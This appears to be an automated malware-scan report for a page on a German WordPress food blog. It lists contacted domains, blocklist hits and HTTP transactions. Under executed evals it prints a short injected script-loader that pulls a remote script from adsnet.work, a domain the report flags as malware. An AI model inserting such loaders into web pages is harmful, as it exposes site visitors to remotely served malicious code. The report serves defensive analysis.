Overview

URLbe-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4
IP 217.160.0.253 (Germany)
ASN#8560 IONOS SE
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-11-24 17:16:05 UTC
StatusLoading report..
IDS alerts0
Blocklist alert11
urlquery alerts No alerts detected
Tags None

Domain Summary (11)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
r3.o.lencr.org (6) 344 No data No data 23.36.77.32
ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-24 05:30:55 UTC 34.117.237.239
img-getpocket.cdn.mozilla.net (6) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
adsnet.work (1) 0 2015-06-06 16:23:15 UTC 2022-11-23 08:14:41 UTC 193.3.19.36 Unknown ranking
hydrahydra.kim (1) 0 2021-10-19 18:50:29 UTC 2022-11-23 08:17:04 UTC 193.3.19.36 Unknown ranking
firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-11-24 05:36:55 UTC 34.102.187.140
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
be-foodie.de (28) 0 2014-10-11 10:16:27 UTC 2022-11-24 16:53:18 UTC 217.160.0.253 Unknown ranking
ajax.googleapis.com (1) 12905 2013-08-16 09:51:31 UTC 2022-11-24 10:54:12 UTC 142.250.74.10
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.35.167.249

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-24 2 be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4 Malware
2022-11-24 2 be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/ Malware
2022-11-24 2 be-foodie.de/wp-content/themes/h-k-foodies/tinymce.css?ver=4.5.28 Malware
2022-11-24 2 be-foodie.de/wp-content/plugins/search-autocomplete/css/blank/jquery-ui-1.8 (...) Malware
2022-11-24 2 be-foodie.de/wp-content/plugins/form-lightbox/colorbox/style-4/colorbox.css (...) Malware
2022-11-24 2 be-foodie.de/wp-content/themes/h-k-foodies/js/jquery.pngFix.pack.js?ver=4.5.28 Malware
2022-11-24 2 be-foodie.de/wp-content/plugins/search-autocomplete/includes/jquery-ui-1.8. (...) Malware
2022-11-24 2 be-foodie.de/wp-includes/js/swfobject.js?ver=2.2-20120417 Malware
2022-11-24 2 be-foodie.de/wp-includes/js/wp-embed.min.js?ver=4.5.28 Malware
2022-11-24 2 be-foodie.de/wp-content/plugins/search-autocomplete/autocomplete-scripts.ph (...) Malware
2022-11-24 2 adsnet.work/scripts/placer.js Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 217.160.0.253
Date UQ / IDS / BL URL IP
2023-01-02 17:14:17 +0000 0 - 2 - 0 wingaeb.de/wp-content/uploads/2021/12/Setup_w (...) 217.160.0.253
2022-12-28 17:39:14 +0000 0 - 2 - 10 be-foodie.de/blog/author/admin/ 217.160.0.253
2022-12-02 11:00:05 +0000 0 - 0 - 10 be-foodie.de/ 217.160.0.253
2022-12-01 09:34:13 +0000 0 - 0 - 2 findingyouwithamy.com/ 217.160.0.253
2022-11-24 17:16:05 +0000 0 - 0 - 11 be-foodie.de/blog/2011/09/von-wegen-viele-koc (...) 217.160.0.253


Last 5 reports on ASN: IONOS SE
Date UQ / IDS / BL URL IP
2023-02-02 02:25:20 +0000 0 - 0 - 19 vidadigna.alboan.org/ 82.223.31.192
2023-02-02 02:19:46 +0000 0 - 1 - 0 sierrasdecordoba.com/ 82.223.217.20
2023-02-02 02:03:18 +0000 0 - 0 - 16 fotografie-classen.de/http:/fotografie-classe (...) 217.160.0.204
2023-02-02 01:38:50 +0000 0 - 2 - 0 planosdemadrid.com/ 82.165.192.156
2023-02-02 01:36:19 +0000 0 - 3 - 0 stack.gidra.de/ 82.165.22.115


Last 3 reports on domain: be-foodie.de
Date UQ / IDS / BL URL IP
2022-12-28 17:39:14 +0000 0 - 2 - 10 be-foodie.de/blog/author/admin/ 217.160.0.253
2022-12-02 11:00:05 +0000 0 - 0 - 10 be-foodie.de/ 217.160.0.253
2022-11-24 17:16:05 +0000 0 - 0 - 11 be-foodie.de/blog/2011/09/von-wegen-viele-koc (...) 217.160.0.253


No other reports with similar screenshot

JavaScript

Executed Scripts (19)

Executed Evals (2)
#1 JavaScript::Eval (size: 2410) - SHA256: 8d72f2d641414d800262a0a87434347c3330f42cc6a2275e312184723f6a4dea
(function(m) {
    jQuery.fn.pngFix = function(c) {
        c = jQuery.extend({
            blankgif: 'blank.gif'
        }, c);
        var e = (navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) == 4 && navigator.appVersion.indexOf("MSIE 5.5") != -1);
        var f = (navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) == 4 && navigator.appVersion.indexOf("MSIE 6.0") != -1);
        if (jQuery.browser.msie && (e || f)) {
            jQuery(this).find("img[src$=.png]").each(function() {
                jQuery(this).attr('width', jQuery(this).width());
                jQuery(this).attr('height', jQuery(this).height());
                var a = '';
                var b = '';
                var g = (jQuery(this).attr('id')) ? 'id="' + jQuery(this).attr('id') + '" ' : '';
                var h = (jQuery(this).attr('class')) ? 'class="' + jQuery(this).attr('class') + '" ' : '';
                var i = (jQuery(this).attr('title')) ? 'title="' + jQuery(this).attr('title') + '" ' : '';
                var j = (jQuery(this).attr('alt')) ? 'alt="' + jQuery(this).attr('alt') + '" ' : '';
                var k = (jQuery(this).attr('align')) ? 'float:' + jQuery(this).attr('align') + ';' : '';
                var d = (jQuery(this).parent().attr('href')) ? 'cursor:hand;' : '';
                if (this.style.border) {
                    a += 'border:' + this.style.border + ';';
                    this.style.border = ''
                }
                if (this.style.padding) {
                    a += 'padding:' + this.style.padding + ';';
                    this.style.padding = ''
                }
                if (this.style.margin) {
                    a += 'margin:' + this.style.margin + ';';
                    this.style.margin = ''
                }
                var l = (this.style.cssText);
                b += '<span ' + g + h + i + j;
                b += 'style="position:relative;white-space:pre-line;display:inline-block;background:transparent;' + k + d;
                b += 'width:' + jQuery(this).width() + 'px;height:' + jQuery(this).height() + 'px;';
                b += 'filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'' + jQuery(this).attr('src') + '\', sizingMethod=\'scale\');';
                b += l + '"></span>';
                if (a != '') {
                    b = '<span style="position:relative;display:inline-block;' + a + d + 'width:' + jQuery(this).width() + 'px;height:' + jQuery(this).height() + 'px;">' + b + '</span>'
                }
                jQuery(this).hide();
                jQuery(this).after(b)
            });
            jQuery(this).find("*").each(function() {
                var a = jQuery(this).css('background-image');
                if (a.indexOf(".png") != -1) {
                    var b = a.split('url("')[1].split('")')[0];
                    jQuery(this).css('background-image', 'none');
                    jQuery(this).get(0).runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + b + "',sizingMethod='scale')"
                }
            });
            jQuery(this).find("input[src$=.png]").each(function() {
                var a = jQuery(this).attr('src');
                jQuery(this).get(0).runtimeStyle.filter = 'progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'' + a + '\', sizingMethod=\'scale\');';
                jQuery(this).attr('src', c.blankgif)
            })
        }
        return jQuery
    }
})(jQuery);
#2 JavaScript::Eval (size: 194) - SHA256: 1366398c0e6a949c8289dbe83f51fc7947e13ed2f486613e42f106e17fa96e2b
var script = document.createElement('script');
script.onload = function() {};
script.src = "https://adsnet.work/scripts/placer.js";
document.getElementsByTagName('head')[0].appendChild(script);

Executed Writes (0)


HTTP Transactions (50)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "164D11173045B569CAFB32E300E4C1EC6D6AB177FD34D0414CC40C541268779F"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13716
Expires: Thu, 24 Nov 2022 21:04:30 GMT
Date: Thu, 24 Nov 2022 17:15:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5993
Cache-Control: max-age=154509
Date: Thu, 24 Nov 2022 17:15:54 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 12:11:03 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F708)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2556
Expires: Thu, 24 Nov 2022 17:58:30 GMT
Date: Thu, 24 Nov 2022 17:15:54 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Backoff, Alert, Content-Type, Retry-After, Content-Length
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Thu, 24 Nov 2022 16:17:18 GMT
cache-control: public,max-age=3600
age: 3516
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    d130218d0e2841f39c99610fe1a2ab90
Sha1:   29fbe1e177ee55c7a61ae0a206afff271cf5f945
Sha256: 6b6d74dccf10c2bc98a91c3388280d7ba1d9596bf8cadd7db0e2f63720b3d152
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: s+lALpjtyYWNK9GORqCf1eyXJ5qGHIkVbBc4LEnXj7EPY9WAzSYmFwwkTgI0m84tGaScUyrdOH/cp0kR1zA3zQ==
x-amz-request-id: 9MA4SWXCVGWNDMN2
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Thu, 24 Nov 2022 16:40:28 GMT
age: 2126
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         217.160.0.253
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://be-foodie.de/xmlrpc.php
Location: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 24 Nov 2022 17:15:54 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/ HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://be-foodie.de/xmlrpc.php
Link: <http://be-foodie.de/wp-json/>; rel="https://api.w.org/", <http://be-foodie.de/?p=1139>; rel=shortlink
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1711), with CRLF, LF line terminators
Size:   9299
Md5:    975fcc794628467b22fcec9d8d50f264
Sha1:   85d852c11e240c0d82d3eaf8d72278f43cec12e1
Sha256: 6dd875a309ea7d5d2b17e0a4efab80e5172d1a494eefaf397039a237796d69ee

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Backoff, Pragma, Alert, Content-Type, ETag, Retry-After, Last-Modified, Content-Length, Cache-Control, Expires
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Thu, 24 Nov 2022 17:08:53 GMT
cache-control: public,max-age=3600
age: 421
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /ajax/libs/jquery/1.5/jquery.min.js?ver=4.5.28 HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/

search
                                         142.250.74.10
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="hosted-libraries-pushers"
Report-To: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
Timing-Allow-Origin: *
Content-Length: 30082
Date: Thu, 24 Nov 2022 17:15:54 GMT
Expires: Fri, 24 Nov 2023 17:15:54 GMT
Cache-Control: public, max-age=31536000, stale-while-revalidate=2592000
Last-Modified: Tue, 03 Mar 2020 19:15:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65168)
Size:   30082
Md5:    ebaa24930d6b905fe00c9457484b78a9
Sha1:   f97496ee81148e264b3735464b8bfced1a8b2fad
Sha256: b9bd9830d7eceae230cfaa5105e8a3ec432392f270cee156637dac8d0684d614
                                        
                                            GET /wp-content/themes/h-k-foodies/reset.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 648
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 16:12:57 GMT
ETag: "288-49ec40d137440"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (648), with no line terminators
Size:   648
Md5:    5eafd59c737bd3f325f00e9de44a1d3c
Sha1:   af2d75a984f60fe48eae8647340d8da1a225951b
Sha256: 92f20026b4b7f5e5acee518b18cf9025cbf08fae0b4a6e25b22b9a7bf399be54
                                        
                                            GET /wp-content/themes/h-k-foodies/960.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 5600
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Tue, 24 May 2011 10:47:29 GMT
ETag: "15e0-4a403507bf240"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (5600), with no line terminators
Size:   5600
Md5:    9edb9a7db86fe1d7006fb0ddb45a5745
Sha1:   8913d2057368b725ebf48c8b07d1d981da5a2909
Sha256: b4efd7e777ca9af98423038339368212b94467a206990a91eec71f2f6910c335
                                        
                                            GET /wp-content/themes/h-k-foodies/text.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 418
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 16:12:57 GMT
ETag: "1a2-49ec40d137440"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (418), with no line terminators
Size:   418
Md5:    9ab4811156ff06dca5600d6761c922b3
Sha1:   856ded8d11666de396a7987f50defacbcd4758af
Sha256: 7c1a8b75698b0b7cf0bd5bd9c6afe6cf85696f1441b329ddf5cb6642f28462b4
                                        
                                            GET /wp-content/themes/h-k-foodies/style.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 10082
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Mon, 01 Feb 2016 14:26:14 GMT
ETag: "2762-52ab62acc4d80"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   10082
Md5:    46b8277e2b06596f8a5b43baa1cd2542
Sha1:   130cbc05da15eac4a8d065fa029eab73557b0f07
Sha256: f620234c7c0c9b8a7a0312e610c084608a0785749ab32352ff4718f797591cb9
                                        
                                            GET /wp-content/themes/h-k-foodies/tinymce.css?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 66
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Sun, 08 May 2011 13:36:05 GMT
ETag: "42-4a2c3cdfbdb40"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   66
Md5:    3c8dfa98ec60ce1eef9e36ffba5e2326
Sha1:   ae573cb2c0c22f29b8d7bcbe81efa6e6a5f528c5
Sha256: 65dd447cee2d93c5c660a10f071a92f96a835e559065bcab0e89a1b85a474097

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/search-autocomplete/css/blank/jquery-ui-1.8.9.custom.css?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 388
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 10:05:21 GMT
ETag: "184-4a51c5b94fa40"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   388
Md5:    7edf8f2f9e98bc025092e598bd61c542
Sha1:   40c1a7b8c26cbab93bdfb94d9f9f09f7edf8b8d2
Sha256: fd4497ec9dbd1d48ea42a56370c3adde4a2e1ba3fcc40986c512fab8f75d98b6

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/h-k-foodies/my-editor-style.css?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 1865
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Sun, 08 May 2011 17:09:34 GMT
ETag: "749-4a2c6c975af80"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   1865
Md5:    3d3c2a589ab7bb3dce118d7eeb507072
Sha1:   9d43f7b34c5034471ed4c18acb00fccd46a0a5ed
Sha256: 9d92c06f7a91b874ed580741de2980fd600b204df65e3c7f7a5d7474ffd37a36
                                        
                                            GET /wp-content/plugins/form-lightbox/colorbox/style-4/colorbox.css?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 3786
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2016 07:50:02 GMT
ETag: "eca-52a74485a3e80"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   3786
Md5:    8a1bc865bf21844aca00f57e7a27640b
Sha1:   e59089a1a5dad04ab3c5cc7835937aca36e44f70
Sha256: 976cfad87d89a16a61611ad658c139b8fd1a9dada80afe67f91f0e8ee35cb04e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6079
Cache-Control: max-age=149534
Date: Thu, 24 Nov 2022 17:15:54 GMT
Etag: "637f3429-1d7"
Expires: Sat, 26 Nov 2022 10:48:08 GMT
Last-Modified: Thu, 24 Nov 2022 09:06:49 GMT
Server: ECS (ska/F708)
X-Cache: HIT
Content-Length: 471

                                        
